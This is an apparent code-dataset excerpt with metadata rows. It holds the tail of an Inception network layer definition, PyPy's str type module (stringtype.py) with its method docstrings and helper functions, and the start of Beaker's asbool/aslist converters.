.conv(1, 1, 24, 1, 1, name='inception_4c_5x5_reduce')
.conv(5, 5, 64, 1, 1, name='inception_4c_5x5'))
(self.feed('inception_4b_output')
.max_pool(3, 3, 1, 1, name='inception_4c_pool')
.conv(1, 1, 64, 1, 1, name='inception_4c_pool_proj'))
(self.feed('inception_4c_1x1',
'inception_4c_3x3',
'inception_4c_5x5',
'inception_4c_pool_proj')
.concat(3, name='inception_4c_output')
.conv(1, 1, 112, 1, 1, name='inception_4d_1x1'))
(self.feed('inception_4c_output')
.conv(1, 1, 144, 1, 1, name='inception_4d_3x3_reduce')
.conv(3, 3, 288, 1, 1, name='inception_4d_3x3'))
(self.feed('inception_4c_output')
.conv(1, 1, 32, 1, 1, name='inception_4d_5x5_reduce')
.conv(5, 5, 64, 1, 1, name='inception_4d_5x5'))
(self.feed('inception_4c_output')
.max_pool(3, 3, 1, 1, name='inception_4d_pool')
.conv(1, 1, 64, 1, 1, name='inception_4d_pool_proj'))
(self.feed('inception_4d_1x1',
'inception_4d_3x3',
'inception_4d_5x5',
'inception_4d_pool_proj')
.concat(3, name='inception_4d_output')
.conv(1, 1, 256, 1, 1, name='inception_4e_1x1'))
(self.feed('inception_4d_output')
.conv(1, 1, 160, 1, 1, name='inception_4e_3x3_reduce')
.conv(3, 3, 320, 1, 1, name='inception_4e_3x3'))
(self.feed('inception_4d_output')
.conv(1, 1, 32, 1, 1, name='inception_4e_5x5_reduce')
.conv(5, 5, 128, 1, 1, name='inception_4e_5x5'))
(self.feed('inception_4d_output')
.max_pool(3, 3, 1, 1, name='inception_4e_pool')
.conv(1, 1, 128, 1, 1, name='inception_4e_pool_proj'))
(self.feed('inception_4e_1x1',
'inception_4e_3x3',
'inception_4e_5x5',
'inception_4e_pool_proj')
.concat(3, name='inception_4e_output')
.max_pool(3, 3, 2, 2, name='pool4_3x3_s2')
.conv(1, 1, 256, 1, 1, name='inception_5a_1x1'))
(self.feed('pool4_3x3_s2')
.conv(1, 1, 160, 1, 1, name='inception_5a_3x3_reduce')
.conv(3, 3, 320, 1, 1, name='inception_5a_3x3'))
(self.feed('pool4_3x3_s2')
.conv(1, 1, 32, 1, 1, name='inception_5a_5x5_reduce')
.conv(5, 5, 128, 1, 1, name='inception_5a_5x5'))
(self.feed('pool4_3x3_s2')
.max_pool(3, 3, 1, 1, name='inception_5a_pool')
.conv(1, 1, 128, 1, 1, name='inception_5a_pool_proj'))
(self.feed('inception_5a_1x1',
'inception_5a_3x3',
'inception_5a_5x5',
'inception_5a_pool_proj')
.concat(3, name='inception_5a_output')
.conv(1, 1, 384, 1, 1, name='inception_5b_1x1'))
(self.feed('inception_5a_output')
.conv(1, 1, 192, 1, 1, name='inception_5b_3x3_reduce')
.conv(3, 3, 384, 1, 1, name='inception_5b_3x3'))
(self.feed('inception_5a_output')
.conv(1, 1, 48, 1, 1, name='inception_5b_5x5_reduce')
.conv(5, 5, 128, 1, 1, name='inception_5b_5x5'))
(self.feed('inception_5a_output')
.max_pool(3, 3, 1, 1, name='inception_5b_pool')
.conv(1, 1, 128, 1, 1, name='inception_5b_pool_proj'))
(self.feed('inception_5b_1x1',
'inception_5b_3x3',
'inception_5b_5x5',
'inception_5b_pool_proj')
.concat(3, name='inception_5b_output')
.avg_pool(7, 7, 1, 1, padding='VALID', name='pool5_7x7_s1')
.fc(1000, relu=False, name='loss3_classifier')
.softmax(name='prob'))
| true
| true
|
790c7801f182960ff2919d3799dd5e962f483844
| 18,300
|
py
|
Python
|
pypy/objspace/std/stringtype.py
|
woodrow/pyoac
|
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
|
[
"MIT"
] | 1
|
2019-05-27T00:58:46.000Z
|
2019-05-27T00:58:46.000Z
|
pypy/objspace/std/stringtype.py
|
woodrow/pyoac
|
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
|
[
"MIT"
] | null | null | null |
pypy/objspace/std/stringtype.py
|
woodrow/pyoac
|
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
|
[
"MIT"
] | null | null | null |
from pypy.objspace.std.stdtypedef import *
from pypy.objspace.std.basestringtype import basestring_typedef
from sys import maxint
from pypy.rlib.objectmodel import specialize
def wrapstr(space, s):
    """Wrap the interpreter-level string *s* as an app-level str object.

    Depending on the object-space configuration this returns a shared
    prebuilt object (the empty string, or single characters when
    ``withprebuiltchar`` is set) or a rope-backed object instead of a
    plain ``W_StringObject``.
    """
    from pypy.objspace.std.stringobject import W_StringObject
    from pypy.objspace.std.ropeobject import rope, W_RopeObject
    std_cfg = space.config.objspace.std
    if std_cfg.sharesmallstr:
        if std_cfg.withprebuiltchar:
            # Share both the empty string and every single character.
            if len(s) == 0:
                if std_cfg.withrope:
                    return W_RopeObject.EMPTY
                return W_StringObject.EMPTY
            if len(s) == 1:
                # s[0]: annotator hint that this is a single char
                return wrapchar(space, s[0])
        else:
            # Only the empty string is shared in this configuration.
            if len(s) == 0:
                if std_cfg.withrope:
                    return W_RopeObject.EMPTY
                return W_StringObject.EMPTY
    if std_cfg.withrope:
        return W_RopeObject(rope.LiteralStringNode(s))
    return W_StringObject(s)
def wrapchar(space, c):
    """Wrap a single character *c*, reusing the prebuilt per-character
    objects when ``withprebuiltchar`` is enabled."""
    from pypy.objspace.std.stringobject import W_StringObject
    from pypy.objspace.std.ropeobject import rope, W_RopeObject
    use_rope = space.config.objspace.std.withrope
    if space.config.objspace.std.withprebuiltchar:
        # One shared object per character code.
        if use_rope:
            return W_RopeObject.PREBUILT[ord(c)]
        return W_StringObject.PREBUILT[ord(c)]
    if use_rope:
        return W_RopeObject(rope.LiteralStringNode(c))
    return W_StringObject(c)
def sliced(space, s, start, stop, orig_obj):
    """Return a wrapped substring s[start:stop], sharing storage when possible."""
    assert start >= 0
    assert stop >= 0
    assert not space.config.objspace.std.withrope
    # A full-range slice of a plain str can be returned unchanged.
    if start == 0 and stop == len(s) and space.is_w(space.type(orig_obj), space.w_str):
        return orig_obj
    if space.config.objspace.std.withstrslice:
        from pypy.objspace.std.strsliceobject import W_StringSliceObject
        span = stop - start
        # XXX heuristic, should be improved!  Only slices large enough pay
        # for themselves as lazy slice objects.
        if span > len(s) * 0.20 + 40:
            return W_StringSliceObject(s, start, stop)
    return wrapstr(space, s[start:stop])
def joined(space, strlist):
    """Concatenate a list of strings, lazily when str-join objects are enabled."""
    assert not space.config.objspace.std.withrope
    if not space.config.objspace.std.withstrjoin:
        return wrapstr(space, "".join(strlist))
    from pypy.objspace.std.strjoinobject import W_StringJoinObject
    return W_StringJoinObject(strlist)
def joined2(space, str1, str2):
    """Concatenate exactly two strings, lazily when str-join objects are enabled."""
    assert not space.config.objspace.std.withrope
    if not space.config.objspace.std.withstrjoin:
        return wrapstr(space, str1 + str2)
    from pypy.objspace.std.strjoinobject import W_StringJoinObject
    return W_StringJoinObject([str1, str2])
str_join = SMM('join', 2,
doc='S.join(sequence) -> string\n\nReturn a string which is'
' the concatenation of the strings in the\nsequence. '
' The separator between elements is S.')
str_split = SMM('split', 3, defaults=(None,-1),
doc='S.split([sep [,maxsplit]]) -> list of strings\n\nReturn'
' a list of the words in the string S, using sep as'
' the\ndelimiter string. If maxsplit is given, at most'
' maxsplit\nsplits are done. If sep is not specified or'
' is None, any\nwhitespace string is a separator.')
str_rsplit = SMM('rsplit', 3, defaults=(None,-1),
doc='S.rsplit([sep [,maxsplit]]) -> list of'
' strings\n\nReturn a list of the words in the string S,'
' using sep as the\ndelimiter string, starting at the'
' end of the string and working\nto the front. If'
' maxsplit is given, at most maxsplit splits are\ndone.'
' If sep is not specified or is None, any whitespace'
' string\nis a separator.')
str_isdigit = SMM('isdigit', 1,
doc='S.isdigit() -> bool\n\nReturn True if all characters'
' in S are digits\nand there is at least one'
' character in S, False otherwise.')
str_isalpha = SMM('isalpha', 1,
doc='S.isalpha() -> bool\n\nReturn True if all characters'
' in S are alphabetic\nand there is at least one'
' character in S, False otherwise.')
str_isspace = SMM('isspace', 1,
doc='S.isspace() -> bool\n\nReturn True if all characters'
' in S are whitespace\nand there is at least one'
' character in S, False otherwise.')
str_isupper = SMM('isupper', 1,
doc='S.isupper() -> bool\n\nReturn True if all cased'
' characters in S are uppercase and there is\nat'
' least one cased character in S, False otherwise.')
str_islower = SMM('islower', 1,
doc='S.islower() -> bool\n\nReturn True if all cased'
' characters in S are lowercase and there is\nat'
' least one cased character in S, False otherwise.')
str_istitle = SMM('istitle', 1,
doc='S.istitle() -> bool\n\nReturn True if S is a'
' titlecased string and there is at least'
' one\ncharacter in S, i.e. uppercase characters may'
' only follow uncased\ncharacters and lowercase'
' characters only cased ones. Return'
' False\notherwise.')
str_isalnum = SMM('isalnum', 1,
doc='S.isalnum() -> bool\n\nReturn True if all characters'
' in S are alphanumeric\nand there is at least one'
' character in S, False otherwise.')
str_ljust = SMM('ljust', 3, defaults=(' ',),
doc='S.ljust(width[, fillchar]) -> string\n\nReturn S'
' left justified in a string of length width. Padding'
' is\ndone using the specified fill character'
' (default is a space).')
str_rjust = SMM('rjust', 3, defaults=(' ',),
doc='S.rjust(width[, fillchar]) -> string\n\nReturn S'
' right justified in a string of length width.'
' Padding is\ndone using the specified fill character'
' (default is a space)')
str_upper = SMM('upper', 1,
doc='S.upper() -> string\n\nReturn a copy of the string S'
' converted to uppercase.')
str_lower = SMM('lower', 1,
doc='S.lower() -> string\n\nReturn a copy of the string S'
' converted to lowercase.')
str_swapcase = SMM('swapcase', 1,
doc='S.swapcase() -> string\n\nReturn a copy of the'
' string S with uppercase characters\nconverted to'
' lowercase and vice versa.')
str_capitalize = SMM('capitalize', 1,
doc='S.capitalize() -> string\n\nReturn a copy of the'
' string S with only its first'
' character\ncapitalized.')
str_title = SMM('title', 1,
doc='S.title() -> string\n\nReturn a titlecased version'
' of S, i.e. words start with uppercase\ncharacters,'
' all remaining cased characters have lowercase.')
str_find = SMM('find', 4, defaults=(0, maxint),
doc='S.find(sub [,start [,end]]) -> int\n\nReturn the'
' lowest index in S where substring sub is'
' found,\nsuch that sub is contained within'
' s[start,end]. Optional\narguments start and end'
' are interpreted as in slice notation.\n\nReturn -1'
' on failure.')
str_rfind = SMM('rfind', 4, defaults=(0, maxint),
doc='S.rfind(sub [,start [,end]]) -> int\n\nReturn the'
' highest index in S where substring sub is'
' found,\nsuch that sub is contained within'
' s[start,end]. Optional\narguments start and end'
' are interpreted as in slice notation.\n\nReturn -1'
' on failure.')
str_partition = SMM('partition', 2,
doc='S.partition(sep) -> (head, sep, tail)\n\nSearches'
' for the separator sep in S, and returns the part before'
' it,\nthe separator itself, and the part after it. If'
' the separator is not\nfound, returns S and two empty'
' strings.')
str_rpartition = SMM('rpartition', 2,
doc='S.rpartition(sep) -> (tail, sep, head)\n\nSearches'
' for the separator sep in S, starting at the end of S,'
' and returns\nthe part before it, the separator itself,'
' and the part after it. If the\nseparator is not found,'
' returns two empty strings and S.')
str_index = SMM('index', 4, defaults=(0, maxint),
doc='S.index(sub [,start [,end]]) -> int\n\nLike S.find()'
' but raise ValueError when the substring is not'
' found.')
str_rindex = SMM('rindex', 4, defaults=(0, maxint),
doc='S.rindex(sub [,start [,end]]) -> int\n\nLike'
' S.rfind() but raise ValueError when the substring'
' is not found.')
str_replace = SMM('replace', 4, defaults=(-1,),
doc='S.replace (old, new[, count]) -> string\n\nReturn a'
' copy of string S with all occurrences of'
' substring\nold replaced by new. If the optional'
' argument count is\ngiven, only the first count'
' occurrences are replaced.')
str_zfill = SMM('zfill', 2,
doc='S.zfill(width) -> string\n\nPad a numeric string S'
' with zeros on the left, to fill a field\nof the'
' specified width. The string S is never truncated.')
str_strip = SMM('strip', 2, defaults=(None,),
doc='S.strip([chars]) -> string or unicode\n\nReturn a'
' copy of the string S with leading and'
' trailing\nwhitespace removed.\nIf chars is given'
' and not None, remove characters in chars'
' instead.\nIf chars is unicode, S will be converted'
' to unicode before stripping')
str_rstrip = SMM('rstrip', 2, defaults=(None,),
doc='S.rstrip([chars]) -> string or unicode\n\nReturn a'
' copy of the string S with trailing whitespace'
' removed.\nIf chars is given and not None, remove'
' characters in chars instead.\nIf chars is unicode,'
' S will be converted to unicode before stripping')
str_lstrip = SMM('lstrip', 2, defaults=(None,),
doc='S.lstrip([chars]) -> string or unicode\n\nReturn a'
' copy of the string S with leading whitespace'
' removed.\nIf chars is given and not None, remove'
' characters in chars instead.\nIf chars is unicode,'
' S will be converted to unicode before stripping')
str_center = SMM('center', 3, defaults=(' ',),
doc='S.center(width[, fillchar]) -> string\n\nReturn S'
' centered in a string of length width. Padding'
' is\ndone using the specified fill character'
' (default is a space)')
str_count = SMM('count', 4, defaults=(0, maxint),
doc='S.count(sub[, start[, end]]) -> int\n\nReturn the'
' number of occurrences of substring sub in'
' string\nS[start:end]. Optional arguments start and'
' end are\ninterpreted as in slice notation.')
str_endswith = SMM('endswith', 4, defaults=(0, maxint),
doc='S.endswith(suffix[, start[, end]]) -> bool\n\nReturn'
' True if S ends with the specified suffix, False'
' otherwise.\nWith optional start, test S beginning'
' at that position.\nWith optional end, stop'
' comparing S at that position.')
str_expandtabs = SMM('expandtabs', 2, defaults=(8,),
doc='S.expandtabs([tabsize]) -> string\n\nReturn a copy'
' of S where all tab characters are expanded using'
' spaces.\nIf tabsize is not given, a tab size of 8'
' characters is assumed.')
str_splitlines = SMM('splitlines', 2, defaults=(0,),
doc='S.splitlines([keepends]) -> list of'
' strings\n\nReturn a list of the lines in S,'
' breaking at line boundaries.\nLine breaks are not'
' included in the resulting list unless keepends\nis'
' given and true.')
str_startswith = SMM('startswith', 4, defaults=(0, maxint),
doc='S.startswith(prefix[, start[, end]]) ->'
' bool\n\nReturn True if S starts with the specified'
' prefix, False otherwise.\nWith optional start, test'
' S beginning at that position.\nWith optional end,'
' stop comparing S at that position.')
str_translate = SMM('translate', 3, defaults=('',), #unicode mimic not supported now
doc='S.translate(table [,deletechars]) -> string\n\n'
'Return a copy of the string S, where all characters'
' occurring\nin the optional argument deletechars are'
' removed, and the\nremaining characters have been'
' mapped through the given\ntranslation table, which'
' must be a string of length 256.')
str_decode = SMM('decode', 3, defaults=(None, None),
doc='S.decode([encoding[,errors]]) -> object\n\nDecodes S'
' using the codec registered for encoding. encoding'
' defaults\nto the default encoding. errors may be'
' given to set a different error\nhandling scheme.'
" Default is 'strict' meaning that encoding errors"
' raise\na UnicodeDecodeError. Other possible values'
" are 'ignore' and 'replace'\nas well as any other"
' name registerd with codecs.register_error that'
' is\nable to handle UnicodeDecodeErrors.')
str_encode = SMM('encode', 3, defaults=(None, None),
doc='S.encode([encoding[,errors]]) -> object\n\nEncodes S'
' using the codec registered for encoding. encoding'
' defaults\nto the default encoding. errors may be'
' given to set a different error\nhandling scheme.'
" Default is 'strict' meaning that encoding errors"
' raise\na UnicodeEncodeError. Other possible values'
" are 'ignore', 'replace' and\n'xmlcharrefreplace' as"
' well as any other name registered'
' with\ncodecs.register_error that is able to handle'
' UnicodeEncodeErrors.')
# ____________________________________________________________
def descr__new__(space, w_stringtype, w_object=''):
    """Implement str.__new__: wrap str(w_object) as an instance of w_stringtype."""
    # NB. the default value of w_object is really a *wrapped* empty string:
    # there is gateway magic at work
    from pypy.objspace.std.stringobject import W_StringObject
    w_obj = space.str(w_object)
    if space.is_w(w_stringtype, space.w_str):
        # Exact 'str' requested: reuse the object space.str() produced.
        return w_obj  # XXX might be reworked when space.str() typechecks
    value = space.str_w(w_obj)
    if space.config.objspace.std.withrope:
        # Rope implementation: store the value as a single literal rope node.
        from pypy.objspace.std.ropeobject import rope, W_RopeObject
        w_obj = space.allocate_instance(W_RopeObject, w_stringtype)
        W_RopeObject.__init__(w_obj, rope.LiteralStringNode(value))
        return w_obj
    else:
        # Plain string implementation for a (possibly) subclass instance.
        w_obj = space.allocate_instance(W_StringObject, w_stringtype)
        W_StringObject.__init__(w_obj, value)
        return w_obj
# ____________________________________________________________
# App-level type object for 'str'.  newmethod() installs descr__new__ as the
# __new__ slot; registermethods() collects every SMM multimethod defined
# above from this module's globals.
str_typedef = StdTypeDef("str", basestring_typedef,
    __new__ = newmethod(descr__new__),
    __doc__ = '''str(object) -> string
Return a nice string representation of the object.
If the argument is a string, the return value is the same object.'''
    )
str_typedef.custom_hash = True
str_typedef.registermethods(globals())
# ____________________________________________________________
# Helpers for several string implementations
@specialize.argtype(0)
def stringendswith(u_self, suffix, start, end):
    """Return True if u_self[start:end] ends with *suffix* (char-wise compare)."""
    offset = end - len(suffix)
    if offset < start:
        # The suffix does not even fit inside the inspected slice.
        return False
    i = 0
    while i < len(suffix):
        if u_self[offset + i] != suffix[i]:
            return False
        i += 1
    return True
@specialize.argtype(0)
def stringstartswith(u_self, prefix, start, end):
    """Return True if u_self[start:end] starts with *prefix* (char-wise compare)."""
    limit = start + len(prefix)
    if limit > end:
        # The prefix does not fit inside the inspected slice.
        return False
    i = 0
    while i < len(prefix):
        if u_self[start + i] != prefix[i]:
            return False
        i += 1
    return True
| 55.287009
| 87
| 0.549727
|
from pypy.objspace.std.stdtypedef import *
from pypy.objspace.std.basestringtype import basestring_typedef
from sys import maxint
from pypy.rlib.objectmodel import specialize
def wrapstr(space, s):
from pypy.objspace.std.stringobject import W_StringObject
from pypy.objspace.std.ropeobject import rope, W_RopeObject
if space.config.objspace.std.sharesmallstr:
if space.config.objspace.std.withprebuiltchar:
if len(s) <= 1:
if len(s) == 0:
if space.config.objspace.std.withrope:
return W_RopeObject.EMPTY
return W_StringObject.EMPTY
else:
s = s[0]
return wrapchar(space, s)
else:
if len(s) == 0:
if space.config.objspace.std.withrope:
return W_RopeObject.EMPTY
return W_StringObject.EMPTY
if space.config.objspace.std.withrope:
return W_RopeObject(rope.LiteralStringNode(s))
return W_StringObject(s)
def wrapchar(space, c):
from pypy.objspace.std.stringobject import W_StringObject
from pypy.objspace.std.ropeobject import rope, W_RopeObject
if space.config.objspace.std.withprebuiltchar:
if space.config.objspace.std.withrope:
return W_RopeObject.PREBUILT[ord(c)]
return W_StringObject.PREBUILT[ord(c)]
else:
if space.config.objspace.std.withrope:
return W_RopeObject(rope.LiteralStringNode(c))
return W_StringObject(c)
def sliced(space, s, start, stop, orig_obj):
assert start >= 0
assert stop >= 0
assert not space.config.objspace.std.withrope
if start == 0 and stop == len(s) and space.is_w(space.type(orig_obj), space.w_str):
return orig_obj
if space.config.objspace.std.withstrslice:
from pypy.objspace.std.strsliceobject import W_StringSliceObject
if (stop - start) > len(s) * 0.20 + 40:
return W_StringSliceObject(s, start, stop)
return wrapstr(space, s[start:stop])
def joined(space, strlist):
assert not space.config.objspace.std.withrope
if space.config.objspace.std.withstrjoin:
from pypy.objspace.std.strjoinobject import W_StringJoinObject
return W_StringJoinObject(strlist)
else:
return wrapstr(space, "".join(strlist))
def joined2(space, str1, str2):
assert not space.config.objspace.std.withrope
if space.config.objspace.std.withstrjoin:
from pypy.objspace.std.strjoinobject import W_StringJoinObject
return W_StringJoinObject([str1, str2])
else:
return wrapstr(space, str1 + str2)
str_join = SMM('join', 2,
doc='S.join(sequence) -> string\n\nReturn a string which is'
' the concatenation of the strings in the\nsequence. '
' The separator between elements is S.')
str_split = SMM('split', 3, defaults=(None,-1),
doc='S.split([sep [,maxsplit]]) -> list of strings\n\nReturn'
' a list of the words in the string S, using sep as'
' the\ndelimiter string. If maxsplit is given, at most'
' maxsplit\nsplits are done. If sep is not specified or'
' is None, any\nwhitespace string is a separator.')
str_rsplit = SMM('rsplit', 3, defaults=(None,-1),
doc='S.rsplit([sep [,maxsplit]]) -> list of'
' strings\n\nReturn a list of the words in the string S,'
' using sep as the\ndelimiter string, starting at the'
' end of the string and working\nto the front. If'
' maxsplit is given, at most maxsplit splits are\ndone.'
' If sep is not specified or is None, any whitespace'
' string\nis a separator.')
str_isdigit = SMM('isdigit', 1,
doc='S.isdigit() -> bool\n\nReturn True if all characters'
' in S are digits\nand there is at least one'
' character in S, False otherwise.')
str_isalpha = SMM('isalpha', 1,
doc='S.isalpha() -> bool\n\nReturn True if all characters'
' in S are alphabetic\nand there is at least one'
' character in S, False otherwise.')
str_isspace = SMM('isspace', 1,
doc='S.isspace() -> bool\n\nReturn True if all characters'
' in S are whitespace\nand there is at least one'
' character in S, False otherwise.')
str_isupper = SMM('isupper', 1,
doc='S.isupper() -> bool\n\nReturn True if all cased'
' characters in S are uppercase and there is\nat'
' least one cased character in S, False otherwise.')
str_islower = SMM('islower', 1,
doc='S.islower() -> bool\n\nReturn True if all cased'
' characters in S are lowercase and there is\nat'
' least one cased character in S, False otherwise.')
str_istitle = SMM('istitle', 1,
doc='S.istitle() -> bool\n\nReturn True if S is a'
' titlecased string and there is at least'
' one\ncharacter in S, i.e. uppercase characters may'
' only follow uncased\ncharacters and lowercase'
' characters only cased ones. Return'
' False\notherwise.')
str_isalnum = SMM('isalnum', 1,
doc='S.isalnum() -> bool\n\nReturn True if all characters'
' in S are alphanumeric\nand there is at least one'
' character in S, False otherwise.')
str_ljust = SMM('ljust', 3, defaults=(' ',),
doc='S.ljust(width[, fillchar]) -> string\n\nReturn S'
' left justified in a string of length width. Padding'
' is\ndone using the specified fill character'
' (default is a space).')
str_rjust = SMM('rjust', 3, defaults=(' ',),
doc='S.rjust(width[, fillchar]) -> string\n\nReturn S'
' right justified in a string of length width.'
' Padding is\ndone using the specified fill character'
' (default is a space)')
str_upper = SMM('upper', 1,
doc='S.upper() -> string\n\nReturn a copy of the string S'
' converted to uppercase.')
str_lower = SMM('lower', 1,
doc='S.lower() -> string\n\nReturn a copy of the string S'
' converted to lowercase.')
str_swapcase = SMM('swapcase', 1,
doc='S.swapcase() -> string\n\nReturn a copy of the'
' string S with uppercase characters\nconverted to'
' lowercase and vice versa.')
str_capitalize = SMM('capitalize', 1,
doc='S.capitalize() -> string\n\nReturn a copy of the'
' string S with only its first'
' character\ncapitalized.')
str_title = SMM('title', 1,
doc='S.title() -> string\n\nReturn a titlecased version'
' of S, i.e. words start with uppercase\ncharacters,'
' all remaining cased characters have lowercase.')
str_find = SMM('find', 4, defaults=(0, maxint),
doc='S.find(sub [,start [,end]]) -> int\n\nReturn the'
' lowest index in S where substring sub is'
' found,\nsuch that sub is contained within'
' s[start,end]. Optional\narguments start and end'
' are interpreted as in slice notation.\n\nReturn -1'
' on failure.')
str_rfind = SMM('rfind', 4, defaults=(0, maxint),
doc='S.rfind(sub [,start [,end]]) -> int\n\nReturn the'
' highest index in S where substring sub is'
' found,\nsuch that sub is contained within'
' s[start,end]. Optional\narguments start and end'
' are interpreted as in slice notation.\n\nReturn -1'
' on failure.')
str_partition = SMM('partition', 2,
doc='S.partition(sep) -> (head, sep, tail)\n\nSearches'
' for the separator sep in S, and returns the part before'
' it,\nthe separator itself, and the part after it. If'
' the separator is not\nfound, returns S and two empty'
' strings.')
str_rpartition = SMM('rpartition', 2,
doc='S.rpartition(sep) -> (tail, sep, head)\n\nSearches'
' for the separator sep in S, starting at the end of S,'
' and returns\nthe part before it, the separator itself,'
' and the part after it. If the\nseparator is not found,'
' returns two empty strings and S.')
str_index = SMM('index', 4, defaults=(0, maxint),
doc='S.index(sub [,start [,end]]) -> int\n\nLike S.find()'
' but raise ValueError when the substring is not'
' found.')
str_rindex = SMM('rindex', 4, defaults=(0, maxint),
doc='S.rindex(sub [,start [,end]]) -> int\n\nLike'
' S.rfind() but raise ValueError when the substring'
' is not found.')
str_replace = SMM('replace', 4, defaults=(-1,),
doc='S.replace (old, new[, count]) -> string\n\nReturn a'
' copy of string S with all occurrences of'
' substring\nold replaced by new. If the optional'
' argument count is\ngiven, only the first count'
' occurrences are replaced.')
str_zfill = SMM('zfill', 2,
doc='S.zfill(width) -> string\n\nPad a numeric string S'
' with zeros on the left, to fill a field\nof the'
' specified width. The string S is never truncated.')
str_strip = SMM('strip', 2, defaults=(None,),
doc='S.strip([chars]) -> string or unicode\n\nReturn a'
' copy of the string S with leading and'
' trailing\nwhitespace removed.\nIf chars is given'
' and not None, remove characters in chars'
' instead.\nIf chars is unicode, S will be converted'
' to unicode before stripping')
str_rstrip = SMM('rstrip', 2, defaults=(None,),
doc='S.rstrip([chars]) -> string or unicode\n\nReturn a'
' copy of the string S with trailing whitespace'
' removed.\nIf chars is given and not None, remove'
' characters in chars instead.\nIf chars is unicode,'
' S will be converted to unicode before stripping')
str_lstrip = SMM('lstrip', 2, defaults=(None,),
doc='S.lstrip([chars]) -> string or unicode\n\nReturn a'
' copy of the string S with leading whitespace'
' removed.\nIf chars is given and not None, remove'
' characters in chars instead.\nIf chars is unicode,'
' S will be converted to unicode before stripping')
str_center = SMM('center', 3, defaults=(' ',),
doc='S.center(width[, fillchar]) -> string\n\nReturn S'
' centered in a string of length width. Padding'
' is\ndone using the specified fill character'
' (default is a space)')
str_count = SMM('count', 4, defaults=(0, maxint),
doc='S.count(sub[, start[, end]]) -> int\n\nReturn the'
' number of occurrences of substring sub in'
' string\nS[start:end]. Optional arguments start and'
' end are\ninterpreted as in slice notation.')
str_endswith = SMM('endswith', 4, defaults=(0, maxint),
doc='S.endswith(suffix[, start[, end]]) -> bool\n\nReturn'
' True if S ends with the specified suffix, False'
' otherwise.\nWith optional start, test S beginning'
' at that position.\nWith optional end, stop'
' comparing S at that position.')
str_expandtabs = SMM('expandtabs', 2, defaults=(8,),
doc='S.expandtabs([tabsize]) -> string\n\nReturn a copy'
' of S where all tab characters are expanded using'
' spaces.\nIf tabsize is not given, a tab size of 8'
' characters is assumed.')
str_splitlines = SMM('splitlines', 2, defaults=(0,),
doc='S.splitlines([keepends]) -> list of'
' strings\n\nReturn a list of the lines in S,'
' breaking at line boundaries.\nLine breaks are not'
' included in the resulting list unless keepends\nis'
' given and true.')
str_startswith = SMM('startswith', 4, defaults=(0, maxint),
doc='S.startswith(prefix[, start[, end]]) ->'
' bool\n\nReturn True if S starts with the specified'
' prefix, False otherwise.\nWith optional start, test'
' S beginning at that position.\nWith optional end,'
' stop comparing S at that position.')
str_translate = SMM('translate', 3, defaults=('',),
doc='S.translate(table [,deletechars]) -> string\n\n'
'Return a copy of the string S, where all characters'
' occurring\nin the optional argument deletechars are'
' removed, and the\nremaining characters have been'
' mapped through the given\ntranslation table, which'
' must be a string of length 256.')
str_decode = SMM('decode', 3, defaults=(None, None),
doc='S.decode([encoding[,errors]]) -> object\n\nDecodes S'
' using the codec registered for encoding. encoding'
' defaults\nto the default encoding. errors may be'
' given to set a different error\nhandling scheme.'
" Default is 'strict' meaning that encoding errors"
' raise\na UnicodeDecodeError. Other possible values'
" are 'ignore' and 'replace'\nas well as any other"
' name registerd with codecs.register_error that'
' is\nable to handle UnicodeDecodeErrors.')
str_encode = SMM('encode', 3, defaults=(None, None),
doc='S.encode([encoding[,errors]]) -> object\n\nEncodes S'
' using the codec registered for encoding. encoding'
' defaults\nto the default encoding. errors may be'
' given to set a different error\nhandling scheme.'
" Default is 'strict' meaning that encoding errors"
' raise\na UnicodeEncodeError. Other possible values'
" are 'ignore', 'replace' and\n'xmlcharrefreplace' as"
' well as any other name registered'
' with\ncodecs.register_error that is able to handle'
' UnicodeEncodeErrors.')
def descr__new__(space, w_stringtype, w_object=''):
from pypy.objspace.std.stringobject import W_StringObject
w_obj = space.str(w_object)
if space.is_w(w_stringtype, space.w_str):
return w_obj
value = space.str_w(w_obj)
if space.config.objspace.std.withrope:
from pypy.objspace.std.ropeobject import rope, W_RopeObject
w_obj = space.allocate_instance(W_RopeObject, w_stringtype)
W_RopeObject.__init__(w_obj, rope.LiteralStringNode(value))
return w_obj
else:
w_obj = space.allocate_instance(W_StringObject, w_stringtype)
W_StringObject.__init__(w_obj, value)
return w_obj
str_typedef = StdTypeDef("str", basestring_typedef,
__new__ = newmethod(descr__new__),
__doc__ = '''str(object) -> string
Return a nice string representation of the object.
If the argument is a string, the return value is the same object.'''
)
str_typedef.custom_hash = True
str_typedef.registermethods(globals())
@specialize.argtype(0)
def stringendswith(u_self, suffix, start, end):
begin = end - len(suffix)
if begin < start:
return False
for i in range(len(suffix)):
if u_self[begin+i] != suffix[i]:
return False
return True
@specialize.argtype(0)
def stringstartswith(u_self, prefix, start, end):
stop = start + len(prefix)
if stop > end:
return False
for i in range(len(prefix)):
if u_self[start+i] != prefix[i]:
return False
return True
| true
| true
|
790c789ef0591a9f2be37f1d51653b8952fa335a
| 844
|
py
|
Python
|
ita/web/beaker/converters.py
|
Tezar/Assigment-generator
|
2a3d0d10f1e3b215a79efc727e26d2ebbf1bb7a3
|
[
"Apache-2.0"
] | null | null | null |
ita/web/beaker/converters.py
|
Tezar/Assigment-generator
|
2a3d0d10f1e3b215a79efc727e26d2ebbf1bb7a3
|
[
"Apache-2.0"
] | null | null | null |
ita/web/beaker/converters.py
|
Tezar/Assigment-generator
|
2a3d0d10f1e3b215a79efc727e26d2ebbf1bb7a3
|
[
"Apache-2.0"
] | 1
|
2020-07-24T05:48:47.000Z
|
2020-07-24T05:48:47.000Z
|
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
def asbool(obj):
    """Coerce *obj* to a bool.

    Strings are matched case-insensitively (surrounding whitespace ignored)
    against the usual truthy/falsy spellings; any other string raises
    ValueError.  Non-string objects go through bool().
    """
    if not isinstance(obj, str):
        return bool(obj)
    text = obj.strip().lower()
    if text in ('true', 'yes', 'on', 'y', 't', '1'):
        return True
    if text in ('false', 'no', 'off', 'n', 'f', '0'):
        return False
    raise ValueError(
        "String is not true/false: %r" % text)
def aslist(obj, sep=None, strip=True):
    """Coerce *obj* to a list.

    Strings are split on *sep* (whitespace when None), each part optionally
    stripped.  Lists and tuples are returned unchanged, None becomes an
    empty list, and any other object is wrapped in a one-element list.
    """
    if isinstance(obj, str):
        parts = obj.split(sep)
